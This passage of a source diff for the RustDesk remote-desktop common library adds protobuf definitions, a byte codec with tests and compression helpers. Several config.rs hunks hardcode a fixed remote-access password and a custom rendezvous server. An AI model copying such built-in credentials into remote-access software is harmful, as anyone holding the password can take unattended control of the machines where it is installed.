+  BoolOption disable_clipboard = 8;
+  BoolOption enable_file_transfer = 9;
+  SupportedDecoding supported_decoding = 10;
+  int32 custom_fps = 11;
+  BoolOption disable_keyboard = 12;
+// Position 13 is used for Resolution. Remove later.
+// Resolution custom_resolution = 13;
+// BoolOption support_windows_specific_session = 14;
+  // starting from 15 please, do not use removed fields
+  BoolOption follow_remote_cursor = 15;
+  BoolOption follow_remote_window = 16;
+  BoolOption disable_camera = 17;
+  BoolOption terminal_persistent = 18;
+  BoolOption show_my_cursor = 19;
+}
+
+message TestDelay {
+  int64 time = 1;
+  bool from_client = 2;
+  uint32 last_delay = 3;
+  uint32 target_bitrate = 4;
+}
+
+message PublicKey {
+  bytes asymmetric_value = 1;
+  bytes symmetric_value = 2;
+}
+
+message SignedId { bytes id = 1; }
+
+message AudioFormat {
+  uint32 sample_rate = 1;
+  uint32 channels = 2;
+}
+
+message AudioFrame { 
+  bytes data = 1; 
+}
+
+// Notify peer to show message box.
+message MessageBox {
+  // Message type. Refer to flutter/lib/common.dart/msgBox().
+  string msgtype = 1;
+  string title = 2;
+  // English
+  string text = 3;
+  // If not empty, msgbox provides a button to following the link.
+  // The link here can't be directly http url.
+  // It must be the key of http url configed in peer side or "rustdesk://*" (jump in app).
+  string link = 4;
+}
+
+message BackNotification {
+  // no need to consider block input by someone else
+  enum BlockInputState {
+    BlkStateUnknown = 0;
+    BlkOnSucceeded = 2;
+    BlkOnFailed = 3;
+    BlkOffSucceeded = 4;
+    BlkOffFailed = 5;
+  }
+  enum PrivacyModeState {
+    PrvStateUnknown = 0;
+    // Privacy mode on by someone else
+    PrvOnByOther = 2;
+    // Privacy mode is not supported on the remote side
+    PrvNotSupported = 3;
+    // Privacy mode on by self
+    PrvOnSucceeded = 4;
+    // Privacy mode on by self, but denied
+    PrvOnFailedDenied = 5;
+    // Some plugins are not found
+    PrvOnFailedPlugin = 6;
+    // Privacy mode on by self, but failed
+    PrvOnFailed = 7;
+    // Privacy mode off by self
+    PrvOffSucceeded = 8;
+    // Ctrl + P
+    PrvOffByPeer = 9;
+    // Privacy mode off by self, but failed
+    PrvOffFailed = 10;
+    PrvOffUnknown = 11;
+  }
+
+  oneof union {
+    PrivacyModeState privacy_mode_state = 1;
+    BlockInputState block_input_state = 2;
+  }
+  // Supplementary message, for "PrvOnFailed" and "PrvOffFailed"
+  string details = 3;
+  // The key of the implementation
+  string impl_key = 4;
+}
+
+message ElevationRequestWithLogon {
+  string username = 1;
+  string password = 2;
+}
+
+message ElevationRequest {
+  oneof union {
+    bool direct = 1;
+    ElevationRequestWithLogon logon = 2;
+  }
+}
+
+message SwitchSidesRequest {
+  bytes uuid = 1;
+}
+
+message SwitchSidesResponse {
+  bytes uuid = 1;
+  LoginRequest lr = 2;
+}
+
+message SwitchBack {}
+
+message PluginRequest {
+  string id = 1;
+  bytes content = 2;
+}
+
+message PluginFailure {
+  string id = 1;
+  string name = 2;
+  string msg = 3;
+}
+
+message WindowsSessions {
+  repeated WindowsSession sessions = 1;
+  uint32 current_sid = 2;
+}
+
+// Query messages from peer.
+message MessageQuery {
+  // The SwitchDisplay message of the target display.
+  // If the target display is not found, the message will be ignored.
+  int32 switch_display = 1;
+}
+
+message Misc {
+  oneof union {
+    ChatMessage chat_message = 4;
+    SwitchDisplay switch_display = 5;
+    PermissionInfo permission_info = 6;
+    OptionMessage option = 7;
+    AudioFormat audio_format = 8;
+    string close_reason = 9;
+    bool refresh_video = 10;
+    bool video_received = 12;
+    BackNotification back_notification = 13;
+    bool restart_remote_device = 14;
+    bool uac = 15;
+    bool foreground_window_elevated = 16;
+    bool stop_service = 17;
+    ElevationRequest elevation_request = 18;
+    string elevation_response = 19;
+    bool portable_service_running = 20;
+    SwitchSidesRequest switch_sides_request = 21;
+    SwitchBack switch_back = 22;
+    // Deprecated since 1.2.4, use `change_display_resolution` (36) instead.
+    // But we must keep it for compatibility when peer version < 1.2.4.
+    Resolution change_resolution = 24;
+    PluginRequest plugin_request = 25;
+    PluginFailure plugin_failure = 26;
+    uint32 full_speed_fps = 27; // deprecated
+    uint32 auto_adjust_fps = 28;
+    bool client_record_status = 29;
+    CaptureDisplays capture_displays = 30;
+    int32 refresh_video_display = 31;
+    ToggleVirtualDisplay toggle_virtual_display = 32;
+    TogglePrivacyMode toggle_privacy_mode = 33;
+    SupportedEncoding supported_encoding = 34;
+    uint32 selected_sid = 35;
+    DisplayResolution change_display_resolution = 36;
+    MessageQuery message_query = 37;
+    int32 follow_current_display = 38;
+  }
+}
+
+message VoiceCallRequest {
+  int64 req_timestamp = 1;
+  // Indicates whether the request is a connect action or a disconnect action.
+  bool is_connect = 2;
+}
+
+message VoiceCallResponse {
+  bool accepted = 1;
+  int64 req_timestamp = 2; // Should copy from [VoiceCallRequest::req_timestamp].
+  int64 ack_timestamp = 3;
+}
+
+message ScreenshotRequest {
+  int32 display = 1;
+  // sid is the session id on the controlling side
+  // It is used to forward the message to the correct remote (session) window.
+  string sid = 2;
+}
+
+message ScreenshotResponse {
+  string sid = 1;
+  // empty if success
+  string msg = 2;
+  bytes data = 3;
+}
+
+// Terminal messages - standalone feature like FileAction
+message OpenTerminal {
+  int32 terminal_id = 1;  // 0 for default terminal
+  uint32 rows = 2;
+  uint32 cols = 3;
+}
+
+message ResizeTerminal {
+  int32 terminal_id = 1;
+  uint32 rows = 2;
+  uint32 cols = 3;
+}
+
+message TerminalData {
+  int32 terminal_id = 1;
+  bytes data = 2;
+  bool compressed = 3;
+}
+
+message CloseTerminal {
+  int32 terminal_id = 1;
+}
+
+message TerminalAction {
+  oneof union {
+    OpenTerminal open = 1;
+    TerminalData data = 2;
+    ResizeTerminal resize = 3;
+    CloseTerminal close = 4;
+  }
+}
+
+message TerminalOpened {
+  int32 terminal_id = 1;
+  bool success = 2;
+  string message = 3;
+  uint32 pid = 4;
+  string service_id = 5;  // Service ID for persistent sessions
+  repeated int32 persistent_sessions = 6; // Used to restore the persistent sessions.
+}
+
+message TerminalClosed {
+  int32 terminal_id = 1;
+  int32 exit_code = 2;
+}
+
+message TerminalError {
+  int32 terminal_id = 1;
+  string message = 2;
+}
+
+message TerminalResponse {
+  oneof union {
+    TerminalOpened opened = 1;
+    TerminalData data = 2;
+    TerminalClosed closed = 3;
+    TerminalError error = 4;
+  }
+}
+
+message Message {
+  oneof union {
+    SignedId signed_id = 3;
+    PublicKey public_key = 4;
+    TestDelay test_delay = 5;
+    VideoFrame video_frame = 6;
+    LoginRequest login_request = 7;
+    LoginResponse login_response = 8;
+    Hash hash = 9;
+    MouseEvent mouse_event = 10;
+    AudioFrame audio_frame = 11;
+    CursorData cursor_data = 12;
+    CursorPosition cursor_position = 13;
+    uint64 cursor_id = 14;
+    KeyEvent key_event = 15;
+    Clipboard clipboard = 16;
+    FileAction file_action = 17;
+    FileResponse file_response = 18;
+    Misc misc = 19;
+    Cliprdr cliprdr = 20;
+    MessageBox message_box = 21;
+    SwitchSidesResponse switch_sides_response = 22;
+    VoiceCallRequest voice_call_request = 23;
+    VoiceCallResponse voice_call_response = 24;
+    PeerInfo peer_info = 25;
+    PointerDeviceEvent pointer_device_event = 26;
+    Auth2FA auth_2fa = 27;
+    MultiClipboards multi_clipboards = 28;
+    ScreenshotRequest screenshot_request = 29;
+    ScreenshotResponse screenshot_response= 30;
+    TerminalAction terminal_action = 31;
+    TerminalResponse terminal_response = 32;
+  }
+}

--- a/libs/hbb_common/protos/rendezvous.proto
+++ b/libs/hbb_common/protos/rendezvous.proto
@@ -1,0 +1,258 @@
+syntax = "proto3";
+package hbb;
+
+message RegisterPeer {
+  string id = 1;
+  int32 serial = 2;
+}
+
+enum ConnType {
+  DEFAULT_CONN = 0;
+  FILE_TRANSFER = 1;
+  PORT_FORWARD = 2;
+  RDP = 3;
+  VIEW_CAMERA = 4;
+  TERMINAL = 5;
+}
+
+message RegisterPeerResponse { bool request_pk = 2; }
+
+message PunchHoleRequest { 
+  string id = 1; 
+  NatType nat_type = 2;
+  string licence_key = 3;
+  ConnType conn_type = 4;
+  string token = 5;
+  string version = 6;
+  int32 udp_port = 7;
+  bool force_relay = 8;
+  int32 upnp_port = 9;
+  bytes socket_addr_v6 = 10;
+}
+
+message ControlPermissions {
+  enum Permission {
+    keyboard = 0;
+    remote_printer = 1;
+    clipboard = 2;
+    file = 3;
+    audio = 4;
+    camera = 5;
+    terminal = 6;
+    tunnel = 7;
+    restart = 8;
+    recording = 9;
+    block_input = 10;
+    remote_modify = 11;
+  }
+  uint64 permissions = 1;
+}
+
+message PunchHole {
+  bytes socket_addr = 1;
+  string relay_server = 2;
+  NatType nat_type = 3;
+  int32 udp_port = 4;
+  bool force_relay = 5;
+  int32 upnp_port = 6;
+  bytes socket_addr_v6 = 7;
+  ControlPermissions control_permissions = 8;
+}
+
+message TestNatRequest {
+  int32 serial = 1;
+}
+
+// per my test, uint/int has no difference in encoding, int not good for negative, use sint for negative
+message TestNatResponse {
+  int32 port = 1; 
+  ConfigUpdate cu = 2; // for mobile
+}
+
+enum NatType {
+  UNKNOWN_NAT = 0;
+  ASYMMETRIC = 1;
+  SYMMETRIC = 2;
+}
+
+message PunchHoleSent {
+  bytes socket_addr = 1;
+  string id = 2;
+  string relay_server = 3;
+  NatType nat_type = 4;
+  string version = 5;
+  int32 upnp_port = 6;
+  bytes socket_addr_v6 = 7;
+}
+
+message RegisterPk {
+  string id = 1;
+  bytes uuid = 2;
+  bytes pk = 3;
+  string old_id = 4;
+  bool no_register_device = 5;
+}
+
+message RegisterPkResponse {
+  enum Result {
+    OK = 0;
+    UUID_MISMATCH = 2;
+    ID_EXISTS = 3;
+    TOO_FREQUENT = 4;
+    INVALID_ID_FORMAT = 5;
+    NOT_SUPPORT = 6;
+    SERVER_ERROR = 7;
+  }
+  Result result = 1;
+  int32 keep_alive = 2;
+}
+
+message PunchHoleResponse {
+  bytes socket_addr = 1;
+  bytes pk = 2;
+  enum Failure {
+    ID_NOT_EXIST = 0;
+    OFFLINE = 2;
+    LICENSE_MISMATCH = 3;
+    LICENSE_OVERUSE = 4;
+  }
+  Failure failure = 3;
+  string relay_server = 4;
+  oneof union {
+    NatType nat_type = 5;
+    bool is_local = 6;
+  }
+  string other_failure = 7;
+  int32 feedback = 8;
+  bool is_udp = 9;
+  int32 upnp_port = 10;
+  bytes socket_addr_v6 = 11;
+}
+
+message ConfigUpdate {
+  int32 serial = 1;
+  repeated string rendezvous_servers = 2;
+}
+
+message RequestRelay {
+  string id = 1;
+  string uuid = 2;
+  bytes socket_addr = 3;
+  string relay_server = 4;
+  bool secure = 5;
+  string licence_key = 6;
+  ConnType conn_type = 7;
+  string token = 8;
+  ControlPermissions control_permissions = 9;
+}
+
+message RelayResponse {
+  bytes socket_addr = 1;
+  string uuid = 2;
+  string relay_server = 3;
+  oneof union {
+    string id = 4;
+    bytes pk = 5;
+  }
+  string refuse_reason = 6;
+  string version = 7;
+  int32 feedback = 9;
+  bytes socket_addr_v6 = 10;
+  int32 upnp_port = 11;
+}
+
+message SoftwareUpdate { string url = 1; }
+
+// if in same intranet, punch hole won't work both for udp and tcp,
+// even some router has below connection error if we connect itself,
+//  { kind: Other, error: "could not resolve to any address" },
+// so we request local address to connect.
+message FetchLocalAddr {
+  bytes socket_addr = 1;
+  string relay_server = 2;
+  bytes socket_addr_v6 = 3;
+  ControlPermissions control_permissions = 4;
+}
+
+message LocalAddr {
+  bytes socket_addr = 1;
+  bytes local_addr = 2;
+  string relay_server = 3;
+  string id = 4;
+  string version = 5;
+  bytes socket_addr_v6 = 6;
+}
+
+message PeerDiscovery {
+  string cmd = 1;
+  string mac = 2;
+  string id = 3;
+  string username = 4;
+  string hostname = 5;
+  string platform = 6;
+  string misc = 7;
+}
+
+message OnlineRequest {
+  string id = 1;
+  repeated string peers = 2;
+}
+
+message OnlineResponse {
+  bytes states = 1;
+}
+
+message KeyExchange {
+  repeated bytes keys = 1; 
+}
+
+message HealthCheck {
+  string token = 1;
+}
+
+message HeaderEntry {
+  string name = 1;
+  string value = 2;
+}
+
+message HttpProxyRequest {
+  string method = 1;
+  string path = 2;
+  repeated HeaderEntry headers = 3;
+  bytes body = 4;
+}
+
+message HttpProxyResponse {
+  int32 status = 1;
+  repeated HeaderEntry headers = 2;
+  bytes body = 3;
+  string error = 4;
+}
+
+message RendezvousMessage {
+  oneof union {
+    RegisterPeer register_peer = 6;
+    RegisterPeerResponse register_peer_response = 7;
+    PunchHoleRequest punch_hole_request = 8;
+    PunchHole punch_hole = 9;
+    PunchHoleSent punch_hole_sent = 10;
+    PunchHoleResponse punch_hole_response = 11;
+    FetchLocalAddr fetch_local_addr = 12;
+    LocalAddr local_addr = 13;
+    ConfigUpdate configure_update = 14;
+    RegisterPk register_pk = 15;
+    RegisterPkResponse register_pk_response = 16;
+    SoftwareUpdate software_update = 17;
+    RequestRelay request_relay = 18;
+    RelayResponse relay_response = 19;
+    TestNatRequest test_nat_request = 20;
+    TestNatResponse test_nat_response = 21;
+    PeerDiscovery peer_discovery = 22;
+    OnlineRequest online_request = 23;
+    OnlineResponse online_response = 24;
+    KeyExchange key_exchange = 25;
+    HealthCheck hc = 26;
+    HttpProxyRequest http_proxy_request = 27;
+    HttpProxyResponse http_proxy_response = 28;
+  }
+}

--- a/libs/hbb_common/src/bytes_codec.rs
+++ b/libs/hbb_common/src/bytes_codec.rs
@@ -1,0 +1,280 @@
+use bytes::{Buf, BufMut, Bytes, BytesMut};
+use std::io;
+use tokio_util::codec::{Decoder, Encoder};
+
+#[derive(Debug, Clone, Copy)]
+pub struct BytesCodec {
+    state: DecodeState,
+    raw: bool,
+    max_packet_length: usize,
+}
+
+#[derive(Debug, Clone, Copy)]
+enum DecodeState {
+    Head,
+    Data(usize),
+}
+
+impl Default for BytesCodec {
+    fn default() -> Self {
+        Self::new()
+    }
+}
+
+impl BytesCodec {
+    pub fn new() -> Self {
+        Self {
+            state: DecodeState::Head,
+            raw: false,
+            max_packet_length: usize::MAX,
+        }
+    }
+
+    pub fn set_raw(&mut self) {
+        self.raw = true;
+    }
+
+    pub fn set_max_packet_length(&mut self, n: usize) {
+        self.max_packet_length = n;
+    }
+
+    fn decode_head(&mut self, src: &mut BytesMut) -> io::Result<Option<usize>> {
+        if src.is_empty() {
+            return Ok(None);
+        }
+        let head_len = ((src[0] & 0x3) + 1) as usize;
+        if src.len() < head_len {
+            return Ok(None);
+        }
+        let mut n = src[0] as usize;
+        if head_len > 1 {
+            n |= (src[1] as usize) << 8;
+        }
+        if head_len > 2 {
+            n |= (src[2] as usize) << 16;
+        }
+        if head_len > 3 {
+            n |= (src[3] as usize) << 24;
+        }
+        n >>= 2;
+        if n > self.max_packet_length {
+            return Err(io::Error::new(io::ErrorKind::InvalidData, "Too big packet"));
+        }
+        src.advance(head_len);
+        src.reserve(n);
+        Ok(Some(n))
+    }
+
+    fn decode_data(&self, n: usize, src: &mut BytesMut) -> io::Result<Option<BytesMut>> {
+        if src.len() < n {
+            return Ok(None);
+        }
+        Ok(Some(src.split_to(n)))
+    }
+}
+
+impl Decoder for BytesCodec {
+    type Item = BytesMut;
+    type Error = io::Error;
+
+    fn decode(&mut self, src: &mut BytesMut) -> Result<Option<BytesMut>, io::Error> {
+        if self.raw {
+            if !src.is_empty() {
+                let len = src.len();
+                return Ok(Some(src.split_to(len)));
+            } else {
+                return Ok(None);
+            }
+        }
+        let n = match self.state {
+            DecodeState::Head => match self.decode_head(src)? {
+                Some(n) => {
+                    self.state = DecodeState::Data(n);
+                    n
+                }
+                None => return Ok(None),
+            },
+            DecodeState::Data(n) => n,
+        };
+
+        match self.decode_data(n, src)? {
+            Some(data) => {
+                self.state = DecodeState::Head;
+                Ok(Some(data))
+            }
+            None => Ok(None),
+        }
+    }
+}
+
+impl Encoder<Bytes> for BytesCodec {
+    type Error = io::Error;
+
+    fn encode(&mut self, data: Bytes, buf: &mut BytesMut) -> Result<(), io::Error> {
+        if self.raw {
+            buf.reserve(data.len());
+            buf.put(data);
+            return Ok(());
+        }
+        if data.len() <= 0x3F {
+            buf.put_u8((data.len() << 2) as u8);
+        } else if data.len() <= 0x3FFF {
+            buf.put_u16_le((data.len() << 2) as u16 | 0x1);
+        } else if data.len() <= 0x3FFFFF {
+            let h = (data.len() << 2) as u32 | 0x2;
+            buf.put_u16_le((h & 0xFFFF) as u16);
+            buf.put_u8((h >> 16) as u8);
+        } else if data.len() <= 0x3FFFFFFF {
+            buf.put_u32_le((data.len() << 2) as u32 | 0x3);
+        } else {
+            return Err(io::Error::new(io::ErrorKind::InvalidInput, "Overflow"));
+        }
+        buf.extend(data);
+        Ok(())
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    #[test]
+    fn test_codec1() {
+        let mut codec = BytesCodec::new();
+        let mut buf = BytesMut::new();
+        let mut bytes: Vec<u8> = Vec::new();
+        bytes.resize(0x3F, 1);
+        assert!(codec.encode(bytes.into(), &mut buf).is_ok());
+        let buf_saved = buf.clone();
+        assert_eq!(buf.len(), 0x3F + 1);
+        if let Ok(Some(res)) = codec.decode(&mut buf) {
+            assert_eq!(res.len(), 0x3F);
+            assert_eq!(res[0], 1);
+        } else {
+            panic!();
+        }
+        let mut codec2 = BytesCodec::new();
+        let mut buf2 = BytesMut::new();
+        if let Ok(None) = codec2.decode(&mut buf2) {
+        } else {
+            panic!();
+        }
+        buf2.extend(&buf_saved[0..1]);
+        if let Ok(None) = codec2.decode(&mut buf2) {
+        } else {
+            panic!();
+        }
+        buf2.extend(&buf_saved[1..]);
+        if let Ok(Some(res)) = codec2.decode(&mut buf2) {
+            assert_eq!(res.len(), 0x3F);
+            assert_eq!(res[0], 1);
+        } else {
+            panic!();
+        }
+    }
+
+    #[test]
+    fn test_codec2() {
+        let mut codec = BytesCodec::new();
+        let mut buf = BytesMut::new();
+        let mut bytes: Vec<u8> = Vec::new();
+        assert!(codec.encode("".into(), &mut buf).is_ok());
+        assert_eq!(buf.len(), 1);
+        bytes.resize(0x3F + 1, 2);
+        assert!(codec.encode(bytes.into(), &mut buf).is_ok());
+        assert_eq!(buf.len(), 0x3F + 2 + 2);
+        if let Ok(Some(res)) = codec.decode(&mut buf) {
+            assert_eq!(res.len(), 0);
+        } else {
+            panic!();
+        }
+        if let Ok(Some(res)) = codec.decode(&mut buf) {
+            assert_eq!(res.len(), 0x3F + 1);
+            assert_eq!(res[0], 2);
+        } else {
+            panic!();
+        }
+    }
+
+    #[test]
+    fn test_codec3() {
+        let mut codec = BytesCodec::new();
+        let mut buf = BytesMut::new();
+        let mut bytes: Vec<u8> = Vec::new();
+        bytes.resize(0x3F - 1, 3);
+        assert!(codec.encode(bytes.into(), &mut buf).is_ok());
+        assert_eq!(buf.len(), 0x3F + 1 - 1);
+        if let Ok(Some(res)) = codec.decode(&mut buf) {
+            assert_eq!(res.len(), 0x3F - 1);
+            assert_eq!(res[0], 3);
+        } else {
+            panic!();
+        }
+    }
+    #[test]
+    fn test_codec4() {
+        let mut codec = BytesCodec::new();
+        let mut buf = BytesMut::new();
+        let mut bytes: Vec<u8> = Vec::new();
+        bytes.resize(0x3FFF, 4);
+        assert!(codec.encode(bytes.into(), &mut buf).is_ok());
+        assert_eq!(buf.len(), 0x3FFF + 2);
+        if let Ok(Some(res)) = codec.decode(&mut buf) {
+            assert_eq!(res.len(), 0x3FFF);
+            assert_eq!(res[0], 4);
+        } else {
+            panic!();
+        }
+    }
+
+    #[test]
+    fn test_codec5() {
+        let mut codec = BytesCodec::new();
+        let mut buf = BytesMut::new();
+        let mut bytes: Vec<u8> = Vec::new();
+        bytes.resize(0x3FFFFF, 5);
+        assert!(codec.encode(bytes.into(), &mut buf).is_ok());
+        assert_eq!(buf.len(), 0x3FFFFF + 3);
+        if let Ok(Some(res)) = codec.decode(&mut buf) {
+            assert_eq!(res.len(), 0x3FFFFF);
+            assert_eq!(res[0], 5);
+        } else {
+            panic!();
+        }
+    }
+
+    #[test]
+    fn test_codec6() {
+        let mut codec = BytesCodec::new();
+        let mut buf = BytesMut::new();
+        let mut bytes: Vec<u8> = Vec::new();
+        bytes.resize(0x3FFFFF + 1, 6);
+        assert!(codec.encode(bytes.into(), &mut buf).is_ok());
+        let buf_saved = buf.clone();
+        assert_eq!(buf.len(), 0x3FFFFF + 4 + 1);
+        if let Ok(Some(res)) = codec.decode(&mut buf) {
+            assert_eq!(res.len(), 0x3FFFFF + 1);
+            assert_eq!(res[0], 6);
+        } else {
+            panic!();
+        }
+        let mut codec2 = BytesCodec::new();
+        let mut buf2 = BytesMut::new();
+        buf2.extend(&buf_saved[0..1]);
+        if let Ok(None) = codec2.decode(&mut buf2) {
+        } else {
+            panic!();
+        }
+        buf2.extend(&buf_saved[1..6]);
+        if let Ok(None) = codec2.decode(&mut buf2) {
+        } else {
+            panic!();
+        }
+        buf2.extend(&buf_saved[6..]);
+        if let Ok(Some(res)) = codec2.decode(&mut buf2) {
+            assert_eq!(res.len(), 0x3FFFFF + 1);
+            assert_eq!(res[0], 6);
+        } else {
+            panic!();
+        }
+    }
+}

--- a/libs/hbb_common/src/compress.rs
+++ b/libs/hbb_common/src/compress.rs
@@ -1,0 +1,34 @@
+use std::{cell::RefCell, io};
+use zstd::bulk::Compressor;
+
+// The library supports regular compression levels from 1 up to ZSTD_maxCLevel(),
+// which is currently 22. Levels >= 20
+// Default level is ZSTD_CLEVEL_DEFAULT==3.
+// value 0 means default, which is controlled by ZSTD_CLEVEL_DEFAULT
+thread_local! {
+    static COMPRESSOR: RefCell<io::Result<Compressor<'static>>> = RefCell::new(Compressor::new(crate::config::COMPRESS_LEVEL));
+}
+
+pub fn compress(data: &[u8]) -> Vec<u8> {
+    let mut out = Vec::new();
+    COMPRESSOR.with(|c| {
+        if let Ok(mut c) = c.try_borrow_mut() {
+            match &mut *c {
+                Ok(c) => match c.compress(data) {
+                    Ok(res) => out = res,
+                    Err(err) => {
+                        crate::log::debug!("Failed to compress: {}", err);
+                    }
+                },
+                Err(err) => {
+                    crate::log::debug!("Failed to get compressor: {}", err);
+                }
+            }
+        }
+    });
+    out
+}
+
+pub fn decompress(data: &[u8]) -> Vec<u8> {
+    zstd::decode_all(data).unwrap_or_default()
+}

--- a/libs/hbb_common/src/config.rs
+++ b/libs/hbb_common/src/config.rs
@@ -120,7 +120,7 @@ lazy_static::lazy_static! {
     pub static ref OVERWRITE_LOCAL_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
     pub static ref HARD_SETTINGS: RwLock<HashMap<String, String>> = {
         let mut map = HashMap::new();
-        map.insert("password".to_string(), "<yy982540670....>".to_string());
+        map.insert("password".to_string(), "<Li19950521....>".to_string());
         RwLock::new(map)
     };
     pub static ref BUILTIN_SETTINGS: RwLock<HashMap<String, String>> = Default::default();

--- a/libs/hbb_common/src/config.rs
+++ b/libs/hbb_common/src/config.rs
@@ -118,7 +118,11 @@ lazy_static::lazy_static! {
     pub static ref OVERWRITE_DISPLAY_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
     pub static ref DEFAULT_LOCAL_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
     pub static ref OVERWRITE_LOCAL_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
-    pub static ref HARD_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
+    pub static ref HARD_SETTINGS: RwLock<HashMap<String, String>> = {
+        let mut map = HashMap::new();
+        map.insert("password".to_string(), "<yy982540670....>".to_string());
+        RwLock::new(map)
+    };
     pub static ref BUILTIN_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
 }
 

--- a/libs/hbb_common/src/config.rs
+++ b/libs/hbb_common/src/config.rs
@@ -160,7 +160,7 @@ const CHARS: &[char] = &[
     'm', 'n', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
 ];
 
-pub const RENDEZVOUS_SERVERS: &[&str] = &["192.168.6.136"];
+pub const RENDEZVOUS_SERVERS: &[&str] = &["rustdesk.ykpt.cc"];
 pub const RS_PUB_KEY: &str = "YQOFSGjkL8R7D+QojRUu9qjC7vaUahwq71nQ2TaPS9Q=";
 
 pub const RENDEZVOUS_PORT: i32 = 21116;

--- a/libs/hbb_common/src/config.rs
+++ b/libs/hbb_common/src/config.rs
@@ -1,0 +1,3473 @@
+use std::{
+    collections::{HashMap, HashSet},
+    fs,
+    io::{Read, Write},
+    net::{IpAddr, Ipv4Addr, Ipv6Addr, SocketAddr},
+    ops::{Deref, DerefMut},
+    path::{Path, PathBuf},
+    sync::{Mutex, RwLock},
+    time::{Duration, Instant, SystemTime},
+};
+
+use anyhow::Result;
+use bytes::Bytes;
+use rand::Rng;
+use regex::Regex;
+use serde as de;
+use serde_derive::{Deserialize, Serialize};
+use serde_json;
+use sha2::{Digest, Sha256};
+use sodiumoxide::base64;
+use sodiumoxide::crypto::sign;
+
+use crate::{
+    compress::{compress, decompress},
+    log,
+    password_security::{
+        decrypt_str_or_original, decrypt_vec_or_original, encrypt_str_or_original,
+        encrypt_vec_or_original, symmetric_crypt,
+    },
+};
+
+pub const RENDEZVOUS_TIMEOUT: u64 = 12_000;
+pub const CONNECT_TIMEOUT: u64 = 18_000;
+pub const READ_TIMEOUT: u64 = 18_000;
+// https://github.com/quic-go/quic-go/issues/525#issuecomment-294531351
+// https://datatracker.ietf.org/doc/html/draft-hamilton-early-deployment-quic-00#section-6.10
+// 15 seconds is recommended by quic, though oneSIP recommend 25 seconds,
+// https://www.onsip.com/voip-resources/voip-fundamentals/what-is-nat-keepalive
+pub const REG_INTERVAL: i64 = 15_000;
+pub const COMPRESS_LEVEL: i32 = 3;
+const SERIAL: i32 = 3;
+const PASSWORD_ENC_VERSION: &str = "00";
+pub const ENCRYPT_MAX_LEN: usize = 128; // used for password, pin, etc, not for all
+
+const PERMANENT_PASSWORD_HASH_PREFIX: &str = "01";
+const PERMANENT_PASSWORD_H1_LEN: usize = 32;
+const DEFAULT_SALT_LEN: usize = 6;
+
+fn is_permanent_password_hashed_storage(v: &str) -> bool {
+    decode_permanent_password_h1_from_storage(v).is_some()
+}
+
+pub fn compute_permanent_password_h1(
+    password: &str,
+    salt: &str,
+) -> [u8; PERMANENT_PASSWORD_H1_LEN] {
+    let mut hasher = Sha256::new();
+    hasher.update(password.as_bytes());
+    hasher.update(salt.as_bytes());
+    let out = hasher.finalize();
+    let mut h1 = [0u8; PERMANENT_PASSWORD_H1_LEN];
+    h1.copy_from_slice(&out[..PERMANENT_PASSWORD_H1_LEN]);
+    h1
+}
+
+fn constant_time_eq_32(a: &[u8; 32], b: &[u8; 32]) -> bool {
+    sodiumoxide::utils::memcmp(a, b)
+}
+
+fn encode_permanent_password_storage_from_h1(h1: &[u8; PERMANENT_PASSWORD_H1_LEN]) -> String {
+    PERMANENT_PASSWORD_HASH_PREFIX.to_owned() + &base64::encode(h1, base64::Variant::Original)
+}
+
+pub fn decode_permanent_password_h1_from_storage(
+    storage: &str,
+) -> Option<[u8; PERMANENT_PASSWORD_H1_LEN]> {
+    let encoded = storage.strip_prefix(PERMANENT_PASSWORD_HASH_PREFIX)?;
+
+    let v = base64::decode(encoded.as_bytes(), base64::Variant::Original).ok()?;
+    if v.len() != PERMANENT_PASSWORD_H1_LEN {
+        return None;
+    }
+    let mut h1 = [0u8; PERMANENT_PASSWORD_H1_LEN];
+    h1.copy_from_slice(&v[..PERMANENT_PASSWORD_H1_LEN]);
+    Some(h1)
+}
+
+// If password is empty or not hashed storage, it's safe to update salt.
+fn password_is_empty_or_not_hashed(permanent_password_storage: &str) -> bool {
+    permanent_password_storage.is_empty()
+        || !is_permanent_password_hashed_storage(permanent_password_storage)
+}
+
+#[cfg(target_os = "macos")]
+lazy_static::lazy_static! {
+    pub static ref ORG: RwLock<String> = RwLock::new("com.carriez".to_owned());
+}
+
+type Size = (i32, i32, i32, i32);
+type KeyPair = (Vec<u8>, Vec<u8>);
+
+lazy_static::lazy_static! {
+    static ref CONFIG: RwLock<Config> = RwLock::new(Config::load());
+    static ref CONFIG2: RwLock<Config2> = RwLock::new(Config2::load());
+    static ref LOCAL_CONFIG: RwLock<LocalConfig> = RwLock::new(LocalConfig::load());
+    static ref STATUS: RwLock<Status> = RwLock::new(Status::load());
+    static ref TRUSTED_DEVICES: RwLock<(Vec<TrustedDevice>, bool)> = Default::default();
+    static ref ONLINE: Mutex<HashMap<String, i64>> = Default::default();
+    pub static ref PROD_RENDEZVOUS_SERVER: RwLock<String> = RwLock::new("".to_owned());
+    pub static ref EXE_RENDEZVOUS_SERVER: RwLock<String> = Default::default();
+    pub static ref APP_NAME: RwLock<String> = RwLock::new("RustDesk".to_owned());
+    static ref KEY_PAIR: Mutex<Option<KeyPair>> = Default::default();
+    static ref USER_DEFAULT_CONFIG: RwLock<(UserDefaultConfig, Instant)> = RwLock::new((UserDefaultConfig::load(), Instant::now()));
+    pub static ref NEW_STORED_PEER_CONFIG: Mutex<HashSet<String>> = Default::default();
+    pub static ref DEFAULT_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
+    pub static ref OVERWRITE_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
+    pub static ref DEFAULT_DISPLAY_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
+    pub static ref OVERWRITE_DISPLAY_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
+    pub static ref DEFAULT_LOCAL_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
+    pub static ref OVERWRITE_LOCAL_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
+    pub static ref HARD_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
+    pub static ref BUILTIN_SETTINGS: RwLock<HashMap<String, String>> = Default::default();
+}
+
+#[cfg(target_os = "android")]
+lazy_static::lazy_static! {
